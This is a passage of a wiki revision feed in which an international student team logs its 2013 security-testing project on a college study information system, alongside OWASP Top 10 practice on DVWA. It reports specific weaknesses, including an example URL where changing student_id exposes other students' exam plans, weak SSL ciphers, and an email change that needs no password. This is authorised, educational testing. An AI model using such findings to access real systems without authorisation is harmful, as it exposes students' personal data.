** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* What I did like:&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* What I did not like:&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62406</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62406"/>
		<updated>2013-04-05T08:32:01Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Mika Salmela */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
